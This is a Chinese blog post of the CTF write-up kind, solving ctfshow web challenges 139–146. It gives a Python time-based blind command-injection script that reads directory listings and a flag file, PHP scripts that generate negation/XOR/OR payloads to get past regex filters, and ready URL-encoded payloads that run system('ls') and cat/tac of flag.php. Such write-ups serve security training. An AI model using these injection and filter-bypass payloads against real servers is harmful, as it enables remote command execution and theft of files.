ctfshow——web入门139~146

最新推荐文章于 2025-04-03 11:44:20 发布
最新推荐文章于 2025-04-03 11:44:20 发布
阅读量775 收藏 17
点赞数 11
文章标签: php 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/uwvwko/article/details/145937561
版权
web入门139

类似136,但是没有写入的权限

官方的payload:

import requests
import time
import string
 
str = string.ascii_letters + string.digits + '_~'
result = ""
 
for i in range(1, 10):  # 行
    key = 0
    for j in range(1, 15):  # 列
        if key == 1:
            break
        for n in str:
            # awk 'NR=={0}'逐行输出获取
            # cut -c {1} 截取单个字符
            payload = "if [ `ls /|awk 'NR=={0}'|cut -c {1}` == {2} ];then sleep 3;fi".format(i, j, n)
            # print(payload)
            url = "http://984e57b0-32df-4cad-a268-ae816b0f9185.challenge.ctf.show/?c=" + payload
            try:
                requests.get(url, timeout=(2.5, 2.5))
            except:
                result = result + n
                print(result)
                break
            if n == '~':
                key = 1
                result += " "
 
print("Final result:", result)

发现f149_15_h3r3

import requests
import time
import string
str=string.digits+string.ascii_lowercase+"-"
result=""
key=0
for j in range(1,45):
    print(j)
    if key==1:
        break
    for n in str:
        payload="if [ `cat /f149_15_h3r3|cut -c {0}` == {1} ];then sleep 3;fi".format(j,n)
        #print(payload)
        url="http://984e57b0-32df-4cad-a268-ae816b0f9185.challenge.ctf.show/?c="+payload
        try:
            requests.get(url,timeout=(2.5,2.5))
        except:
            result=result+n
            print(result)
            break

将其读取出来

这里是使用了时间盲注,|管道符将 cat /f149_15_h3r3 的输出作为后面的输入 ,因为flag的格式已知,除了{}由44个字符组成,然后通过对str便利,如果if成立,sleep 3

设置超时为2.5秒,如果服务器响应时间超过这个值(由于 sleep 3),则认为条件为真,即找到了正确字符

web入门140

因为最后一步是弱比较,而ctfshow会转化为0,所以就要让intval($code)为0

然后因为这里变量后面加了(),所以是吧变量名当函数调用,f1,f2都要是函数名

有多种解法

$code

1,字母开头的字符串

字符串形式的字母或数字(如 "a", "b123", 等),在 PHP 中,任何以字母开头的字符串在转换为整数时通常会被视为 0。

2,空字符串 "" 和 "0":在转换为整数时也是 0。

3,空数组:空数组 array() 在转换为整数时会被视为 0。

4,整数 0:直接返回整数 0。

5,布尔值 false:布尔值 false 在转换为整数时会被视为 0。

f1=usleep&f2=usleep

f1=system&f2=phpinfo

f1=md5&f2=system(编码后字母开头)

f1=getdate&f2=getdate

web入门141

preg_match('/^\W+$/', $v3)

$v3 变量中的值仅包含非字母数字且非下划线的字符(例如标点符号、空格等)

那我们就要想办法在v3中构造payload

使用文件取反:

<?php
echo urlencode(~ 'system');
echo "\n";
echo urlencode(~ 'ls');
?>

%8C%86%8C%8B%9A%92 %93%8C

%93%8C

tac flag.php :%8B%9E%9C%DF%99%93%9E%98%D1%8F%97%8F

1-phpinfo()-2也是可以执行的

也可以使用异或算法

由此也可以构造出命令(%ff^%83)即为s

web入门142

判断v1是否为数字,然后用sleep延时

那就直接v1=0

也可以0x0

web入门143

把取反过滤了,那就用异或

大致说一下脚本怎么写:通过识别正则列出可以用来构造的字符串

代入命令找出可用的表达式

这里贴一个大佬的脚本

<?php
 
//或
function orRce($par1, $par2){
    $result = (urldecode($par1)|urldecode($par2));
    return $result;
}
 
//异或
function xorRce($par1, $par2){
    $result = (urldecode($par1)^urldecode($par2));
    return $result;
}
 
//取反
function negateRce(){
    fwrite(STDOUT,'[+]your function: ');
 
    $system=str_replace(array("\r\n", "\r", "\n"), "", fgets(STDIN));
 
    fwrite(STDOUT,'[+]your command: ');
 
    $command=str_replace(array("\r\n", "\r", "\n"), "", fgets(STDIN));
 
    echo '[*] (~'.urlencode(~$system).')(~'.urlencode(~$command).');';
}
 
//mode=1代表或,2代表异或,3代表取反
//取反的话,就没必要生成字符去跑了,因为本来就是不可见字符,直接绕过正则表达式
function generate($mode, $preg='/[0-9]/i'){
    if ($mode!=3){
        $myfile = fopen("rce.txt", "w");
        $contents = "";
 
        for ($i=0;$i<256;$i++){
            for ($j=0;$j<256;$j++){
                if ($i<16){
                    $hex_i = '0'.dechex($i);
                }else{
                    $hex_i = dechex($i);
                }
                if ($j<16){
                    $hex_j = '0'.dechex($j);
                }else{
                    $hex_j = dechex($j);
                }
                if(preg_match($preg , hex2bin($hex_i))||preg_match($preg , hex2bin($hex_j))){
                    echo "";
                }else{
                    $par1 = "%".$hex_i;
                    $par2 = '%'.$hex_j;
                    $res = '';
                    if ($mode==1){
                        $res = orRce($par1, $par2);
                    }else if ($mode==2){
                        $res = xorRce($par1, $par2);
                    }
 
                    if (ord($res)>=32&ord($res)<=126){
                        $contents=$contents.$res." ".$par1." ".$par2."\n";
                    }
                }
            }
 
        }
        fwrite($myfile,$contents);
        fclose($myfile);
    }else{
        negateRce();
    }
}
generate(2,'/[a-z]|[0-9]|\+|\-|\.|\_|\||\$|\{|\}|\~|\%|\&|\;/i');
//1代表模式,后面的是过滤规则

生成可用字符列表

def action(arg):
        s1 = ""
        s2 = ""
        with open("rce.txt", "r") as f:
            lines = f.readlines()
            for i in arg:
                for line in lines:
                    if line.startswith(i):
                        s1 += line[2:5]
                        s2 += line[6:9]
                        break
        output = "(\"" + s1 + "\"^\"" + s2 + "\")"
        return output
     
    while True:
        function_input = input("\n[+] 请输入你的函数:")
        command_input = input("[+] 请输入你的命令:")
        param = action(function_input) + action(command_input)
        print("\n[*] 构造的Payload:", param)

执行

system ls:("%0c%06%0c%0b%05%0d"^"%7f%7f%7f%7f%60%60")("%0c%0c"^"%60%7f")

system cat flag.php:("%0c%06%0c%0b%05%0d"^"%7f%7f%7f%7f%60%60")("%0b%01%03%00%06%0c%01%07%01%0f%08%0f"^"%7f%60%60%20%60%60%60%60%2f%7f%60%7f")

这里我们用v3=*("%0c%06%0c%0b%05%0d"^"%7f%7f%7f%7f%60%60")("%0c%0c"^"%60%7f")*

web入门144

check函数是检查v3是否为一个长度为1的字符串

preg_match('/^\W+$/', $v2)$v2 不含大小写字母,数字,下划线

还是使用上题的主体

payload:v1=1&v2=("%0c%06%0c%0b%05%0d"^"%7f%7f%7f%7f%60%60")("%0b%01%03%00%06%0c%01%07%01%0f%08%0f"^"%7f%60%60%20%60%60%60%60%2f%7f%60%7f")&v3=-

这里给一个好用的脚本

web入门145

原理还是一样

可以直接使用上题的脚本:
payload:?v1=1&v2=1&v3=|(('%13%19%13%14%05%0d')|('%60%60%60%60%60%60'))((('%03%01%14%20%06%02')|('%60%60%60%20%60%28')))|

(这里使用|来过滤)

当然我们也可以使用取反:

payload:?v1=1&v2=1&v3=|(~%8C%86%8C%8B%9A%92)(~

%9C%9E%8B%DF%99%93%9E%98%D1%8F%97%8F)|

?v1=%0a1&v2=%0a0&v3=?(~%8c%86%8c%8b%9a%92)(~%9c%9e%8b%df%99%d5):

也可以这样绕过

web入门146

还是一样的

?v1=1&v2=1&v3=|(~%8C%86%8C%8B%9A%92)(~

%9C%9E%8B%DF%99%93%9E%98%D1%8F%97%8F)|

然后也是根据前几题的脚本嗦出来

uwvwko
关注
CTFshow——web入门——php特性(下篇)
h_adam的博客
02-06 6340
web入门——php特性web123web125web126 web123 题目 <?php error_reporting(0); highlight_file(__FILE__); include("flag.php"); $a=$_SERVER['argv']; $c=$_POST['fun']; if(isset($_POST['CTF_SHOW'])&&isset($_POST['CTF_SHOW.COM'])&&!isset($_GET['fl0g']))
CTFshow-web入门-php-web89-150
m0_72655585的博客
07-17 1622
也就是说,当给intval()函数传入一个非空的数组时,intval()函数将会返回1,结合我们preg_match()传入数组返回false的特性,这道题的payload就很清楚了。在php中变量名只有数字字母下划线,被get或者post传入的变量名,如果含有空格、+、[则会被转化为_,所以按理来说我们构造不出CTF_SHOW.COM这个变量(因为含有.),但php中有个特性就是如果传入[,它被转化为_之后,后面的字符就会被保留下来不会被替换。system(‘FLASE’),空指令,失败返回FLASE。
Ctfshow web入门 PHP特性篇 web89-web151 全
Jay17的博客
07-10 2297
Ctfshow web入门 PHP特性篇 web89-web151 全 web入门 PHP特性篇的wp都一把梭哈在这里啦~ 有点多,师傅们可以收藏下来慢慢看,写的应该挺全面的叭..... 有错误敬请斧正!
CTFshow web入门——php特性
小元砸的博客
02-20 7048
Web 89 <?php include("flag.php"); highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if(intval($num)){ echo $flag; } }
CTFshow-web入门-upload-web151-170
m0_72655585的博客
07-17 626
文件上传漏洞 (上传知识点、题型总结大全-upload靶场全解)
ctfshow web入门 php特性
Lum1n0us's Blog
02-18 2144
文章目录web89web90web91web92姿势一姿势二姿势三web93web94web95web96姿势一姿势二web97web98web99web100姿势一姿势二姿势三web101web102-103web104web105web106web107web108web109姿势一姿势二web110web111web112姿势一姿势二姿势三姿势四web113姿势一姿势二web114web115web123web125web126web127web128web129姿势一姿势二web130web131w
ctfshow php特性(89——150plus)
..
12-14 5125
web89 这题的逻辑是如果存在$_GET['num'],则用正则表达式匹配$num中的值,如果成功匹配则程序终止于"no no no",否则进行下一步,如果intval($num)有正确的返回值,则输出$flag。 解题思路:该题要求传入的值不能有数字,那我们的话可以利用preg_match的一个漏洞,即无法处理数组,从而进行绕过正则匹配,同时intval函数处理一个数组有正确的返回值,可以达到输出flag的目的。 payload : num[]= 或 num[]=任意..
你真的会信息收集嘛,信息收集10大技巧,4k文案超详细解析——渗透测试
wholeliubei的博客
02-21 876
在渗透测试中,信息收集是非常关键的一步,它为后续的漏洞发现和利用提供了重要的基础。信息收集是网络安全领域的重要步骤,分为被动与主动收集两种方式。被动收集通过搜索引擎、网络空间搜索引擎、Whois查询等公开渠道获取信息,隐蔽性高。主动收集则直接与目标系统交互,如端口扫描、网络映射、DNS枚举等,可能留下痕迹,需谨慎操作。社会工程学、旁站和C段扫描等其他方式也常用于信息收集。这些方式共同构成了网络安全中不可或缺的信息收集体系。给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助。
CTFshow——web入门(信息泄露)
doraemon12345的博客
05-30 1540
web1 源码泄露 直接 f12 在下面注释行中可以看到flag web2 前台js绕过 方法有很多: 1.ctrl+u 查看源代码 2.burp抓包查看 3.在网址前加上view-source:即可查看源代码 web3 协议头信息泄露 题目提示没思路抓包看看,就用burp抓个包看看,在响应头里发现flag web4 robots后台泄露 题目提示:总有人把后台地址写入robots,帮黑阔大佬们引路。 访问robots.txt,得到flag地址/flagishere.txt,访问该地址拿到flag web
ctfshow-Web入门-58~74wp
yutianovo的博客
09-24 1200
Web58-65 POST c=include($_GET['url']); GET /?url=php://filter/read=convert.base64-encode/resource=flag.php Web66-70 flag 换位置了 /flag.txt Payload还可以用 Web71 import requests url = "http://c5e8824e-b5b4-4842-8d39-bbcb78eb7976.chall.ctf.show/" d = {'c': 'i
CTFshow web入门——文件上传
热门推荐
小元砸的博客
03-14 1万+
Web 151
[ctfshow]web入门——命令执行(web72-web77)
ShenZ的博客
12-02 2693
ctfshow的命令执行(web72-77)
CTFshow——WP(WEB[1~5])
hahaha233330的博客
10-29 772
1、web签到题 F12 2、web2
php8 match表达式使用教程
tangPHP的博客
04-02 433
PHP 8引入了match()表达式,用来替代传统的switch语句,提供更简洁、更安全的方式进行条件匹配。与switch不同,match()是一个表达式,它会返回值,并且使用 严格比较(===
Vulnhub-XXE靶场通关攻略
qq_65852138的博客
03-31 557
将解码结果放在php文件中并加上<?php标识符,进行访问即可得到flag。在flagmeout.php的页面源代码中得到了flag。使用xxe漏洞访问这个目录/etc/.flag.php。得到了xxe/admin.php目录,来到了新页面。将flag放在cyberchef中进行解码。解码admin.php进行代码审计。base64解码,得到用户名和密码。在admin.php目录中进行登录。得到/etc/.flag.php。访问一下robots.txt。尝试读取xxe.php源码。
phpStorm2021.3.3在windows系统上配置Xdebug调试
shenshulong的博客
03-31 216
phpStorm工具中配置Xdebug调试详情过程
unidbg读写跟踪还原X-Gorgon
a545958498的博客
03-31 623
后20字节 0x06292b2e51bf21d8e270474e655a4379e5d3f7f6,指令地址 0x804e8。都是同一个地址,应该是在做加密运算。参数签名函数调用序列 0x88ee0 -> 0x87e48 -> 0x86d60 -> 0x6B14c。第5和6字节 0x0000,指令地址0x13742c,初始化buffer为0后没有再写入。进一步跟踪,查看地址 0xbfffda60 + 0x12 ,在哪里被写入 0x3d。第1个字节 0x84,指令地址 0x81138,直接写入无需计算。
win32汇编环境,网络编程入门之十八
最新发布
iltokyo的博客
04-03 459
如何判断访问的网页是什么编码,以下示例只判断是 UFT-8 还是 GB2312编码,其它的编码方式可以此类推
ctfshow-web入门
01-19
### CTFShow Web 入门教程与资源 #### 图片中的隐藏后门代码 在处理CTF挑战时,有时会遇到图片中嵌入的恶意代码或后门。这类攻击通常利用图像文件格式的特点,在不影响视觉效果的前提下植入可执行代码。为了检测...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值